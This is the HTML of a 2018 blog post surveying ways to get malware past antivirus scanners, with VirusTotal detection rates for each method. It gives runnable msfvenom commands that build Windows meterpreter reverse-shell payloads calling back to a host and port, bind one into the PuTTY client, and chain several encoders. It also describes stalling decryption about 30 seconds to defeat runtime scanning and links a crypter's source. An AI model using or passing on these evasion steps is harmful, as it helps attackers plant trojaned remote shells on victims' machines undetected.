<!DOCTYPE html>
<html lang="en-us">
    <head>
         
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>A Quick Survey on Anti-Anti-Viruses</title>
        <style>

    html body {
        font-family: 'Raleway', sans-serif;
        background-color: white;
    }

    :root {
        --accent: #ffe135;
        --border-width:  5px ;
    }

</style>





<link rel="stylesheet" href="https://bananamafia.dev//css/font.css">


 <link rel="stylesheet" href="https://bananamafia.dev//css/solarized-dark.min.css"> 


<link rel="stylesheet" href="https://bananamafia.dev//css/bootstrap-min.css" integrity="">


<link rel="stylesheet" href="https://bananamafia.dev//css/main.css">


<link rel="stylesheet" href="https://bananamafia.dev//css/font-awesome.min.css" integrity="">
 


    <script src="https://bananamafia.dev/js/highlight.min.js"></script>

     <script src="https://bananamafia.dev/js/python.min.js"></script>  <script src="https://bananamafia.dev/js/cpp.min.js"></script>  <script src="https://bananamafia.dev/js/json.min.js"></script>  <script src="https://bananamafia.dev/js/go.min.js"></script> 

    <script>hljs.initHighlightingOnLoad();</script>




<script async src="https://www.googletagmanager.com/gtag/js?id=UA-143157939-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-143157939-1');
</script>





















<script src="https://bananamafia.dev/js/jquery.min.js"></script>


<script src="https://bananamafia.dev/js/bootstrap.min.js"></script>


<script>$(document).on('click', function() { $('.collapse').collapse('hide'); })</script>
 <meta name="generator" content="Hugo 0.40.1" />
        

        
    </head>

    


    <body>
         
        <nav class="navbar navbar-default navbar-fixed-top">

            <div class="container">

                <div class="navbar-header">

                    <a class="navbar-brand visible-xs" href="#">A Quick Survey on Anti-Anti-Viruses</a>

                    <button class="navbar-toggle" data-target=".navbar-collapse" data-toggle="collapse">
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                    </button>

                </div>

                <div class="collapse navbar-collapse">

                    
                        <ul class="nav navbar-nav">
                            
                                <li><a href="/">Home</a></li>
                            
                                <li><a href="/post/">Posts</a></li>
                            
                                <li><a href="/project/">Projects</a></li>
                            
                        </ul>
                    

                    
                        <ul class="nav navbar-nav navbar-right">
                            
                                <li class="navbar-icon"><a href="mailto:ps1337@mailbox.org"><i class="fa fa-envelope-o"></i></a></li>
                            
                                <li class="navbar-icon"><a href="https://github.com/ps1337/"><i class="fa fa-github"></i></a></li>
                            
                                <li class="navbar-icon"><a href="https://twitter.com/CaptnBanana"><i class="fa fa-twitter"></i></a></li>
                            
                                <li class="navbar-icon"><a href="/index.xml"><i class="fa fa-rss"></i></a></li>
                            
                                <li class="navbar-icon"><a href="https://www.youtube.com/watch?v=QKWKUU0XQ8U"><i class="fa fa-envira"></i></a></li>
                            
                        </ul>
                    

                </div>

            </div>

        </nav>


<main>

    <div class="item">

    
    
    

    
    

    <h4><a href="/post/crypt0r/">A Quick Survey on Anti-Anti-Viruses</a></h4>
    <h5>March 16, 2018</h5>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/malware"><kbd class="item-tag">malware</kbd></a>
    

</div>


    <br> <div class="text-justify">

<h1 id="tl-dr">tl;dr</h1>

<p>AVs can easily be bypassed using malware AES crypters like <a href="https://github.com/ps1337/Crypt0r">Crypt0r</a>:</p>

<p><img src="/img/crypt0r/results.png" alt="AES Parameters" /></p>

<h1 id="open-source-evasion-techniques">Open Source Evasion Techniques</h1>

<p>All of the following results are based on a meterpreter file which was generated like this:</p>

<pre><code>msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -o meter.exe
</code></pre>

<p>All scans are performed on <a href="https://www.virustotal.com">VirusTotal</a>. Please not that this covers static analysis only. However, it will become clear later on that dynamic analysis of the used techniques aren&rsquo;t required at all.</p>

<h2 id="packers">Packers</h2>

<p>Packers compress malware and decompress it at runtime using an embedded decompression stub. Using the packer <code>UPX</code> seems to be suspicious as the detection rates increase by using a packer:</p>

<table width=100% border=1>
    <tr>
        <td align="center" valign="middle"><b>Without Packer</b></td>
        <td align="center" valign="middle"><sup>39</sup>⁄<sub>56</sub></td>
    </tr>
    <tr>
        <td align="center" valign="middle"><b>With Packer</b></td>
        <td align="center" valign="middle"><sup>41</sup>⁄<sub>56</sub></td>
    </tr>
</table>

<h2 id="binder">Binder</h2>

<p>This technique basically combines two executables, a malicious and an ordinary one, into one file. The malicious code will be executed in a separate thread upon startup. This command was used to generate a meterpreter shell in combination with the SSH client PuTTY:</p>

<pre><code>msfvenom
  -p windows/meterpreter/reverse_tcp
  --platform windows
  -x putty.exe
  -k
  -f exe
  LHOST=192.168.1.1
  LPORT=1337
  -f exe
  -o meter.exe
</code></pre>

<p>A slight decrease of detections can be seen:</p>

<table width=100% border=1>
    <tr>
        <td align="center" valign="middle"><b>Without Binder</b></td>
        <td align="center" valign="middle"><sup>39</sup>⁄<sub>56</sub></td>
    </tr>
    <tr>
        <td align="center" valign="middle"><b>With Binder</b></td>
        <td align="center" valign="middle"><sup>33</sup>⁄<sub>56</sub></td>
    </tr>
</table>

<h2 id="encoders">Encoders</h2>

<p>Using Encoders, the malicious payload will be obscured. There are many different approaches for this, however the polymorphic encoder <code>shikata_ga_nai</code> is one of the most widely used ones. When executing a encoded malware file, the entry point of the decoding method will be called. The payload will then be decoded and executed.</p>

<p>The results are the following:
<table width=100% border=1>
    <tr>
        <td align="center" valign="middle"><b>No Encoder</b></td>
        <td align="center" valign="middle"><sup>39</sup>&frasl;<sub>56</sub></td>
    </tr>
    <tr>
        <td align="center" valign="middle"><b>XOR</b></td>
        <td align="center" valign="middle"><sup>33</sup>&frasl;<sub>56</sub></td>
    </tr>
    <tr>
        <td align="center" valign="middle"><b>powershell_x86</b></td>
        <td align="center" valign="middle"><sup>33</sup>&frasl;<sub>56</sub></td>
    </tr>
    <tr>
        <td align="center" valign="middle"><b>shikata_ga_nai</b></td>
        <td align="center" valign="middle"><sup>33</sup>&frasl;<sub>56</sub></td>
    </tr>
</table></p>

<p>No change in detection rates - let&rsquo;s combine multiple encoders and the binding technique:</p>

<pre><code>msfvenom -p windows/meterpreter/reverse_tcp
  LHOST=192.168.1.1
  LPORT 1337
  -f raw
  -e x86/context_time
  -i 1
  --platform windows |

msfvenom -a x86
  --platform windows
  -e x86/countdown
  -i 7
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/context_cpuid
  -i 1
  -f raw |

msfvenom -a x86
  --platform windows
  -e x86/shikata_ga_nai
  -i 2
  -x putty.exe
  -k
  -f exe
  -o meter.exe
</code></pre>

<p>This yields <sup>30</sup>&frasl;<sub>56</sub> - better but still not zero.</p>

<h2 id="using-veil">Using Veil</h2>

<p>Using <a href="https://www.veil-framework.com/">Veil</a>, hiding payloads becomes quite easy using a built-in assistant. Using <code>python/shellcode_inject/aes_encrypt</code> in combination with Pyherion and a shellcode for <code>windows/meterpreter/reverse_tcp</code> decreases the detection rate down to <sup>19</sup>&frasl;<sub>56</sub>.</p>

<h2 id="crypters">Crypters</h2>

<p>Crypters encrypt the malicious shellcode using a secure encryption algorithm. To execute the payload at runtime, the so called stub brute forces the built-in encrypted shellcode in order to invoke it. Using AES-128 and a delayed decryption, it was possible to decrease the detection down to zero for both scantime and runtime. The runtime detection bypass basically delays the start of the decryption routine by performing unnecessary actions like:</p>

<ul>
<li>factorizing primes</li>
<li>approximating pi multiple times</li>
</ul>

<p>In my tests, wasting about 30 seconds was enough to &ldquo;shake off&rdquo; the AV runtime check.</p>

<p>You can check out the source code <a href="https://github.com/ps1337/Crypt0r">here</a>.</p>
</div>

    
    

    

        <h4 class="page-header">Related</h4>

         <div class="item">

    
    
    

    
    

    <h4><a href="/post/bananabot/">Coding A CS:GO Hack</a></h4>
    <h5>June 19, 2019</h5>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/binary"><kbd class="item-tag">binary</kbd></a>
    

</div>
  <div class="item">

    
    
    

    
    

    <h4><a href="/post/multihack/">Creating A Multiplayer Game Hack</a></h4>
    <h5>August 28, 2018</h5>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/binary"><kbd class="item-tag">binary</kbd></a>
    
    <a href="https://bananamafia.dev/tags/hooking"><kbd class="item-tag">hooking</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    

</div>
  <div class="item">

    
    
    

    
    

    <h4><a href="/post/cvar-hax/">Runtime Function Patching</a></h4>
    <h5>August 16, 2018</h5>
    
    <a href="https://bananamafia.dev/tags/c&#43;&#43;"><kbd class="item-tag">c&#43;&#43;</kbd></a>
    
    <a href="https://bananamafia.dev/tags/binary"><kbd class="item-tag">binary</kbd></a>
    
    <a href="https://bananamafia.dev/tags/cracking"><kbd class="item-tag">cracking</kbd></a>
    
    <a href="https://bananamafia.dev/tags/reverse-engineering"><kbd class="item-tag">reverse-engineering</kbd></a>
    

</div>
 

    

    

</main>

        <footer>

            <p class="copyright text-muted">&copy; All rights reserved. Powered by <a href="https://gohugo.io">Hugo</a> and <a href="https://github.com/calintat/minimal">Minimal</a></p>

        </footer>

    </body>

</html>

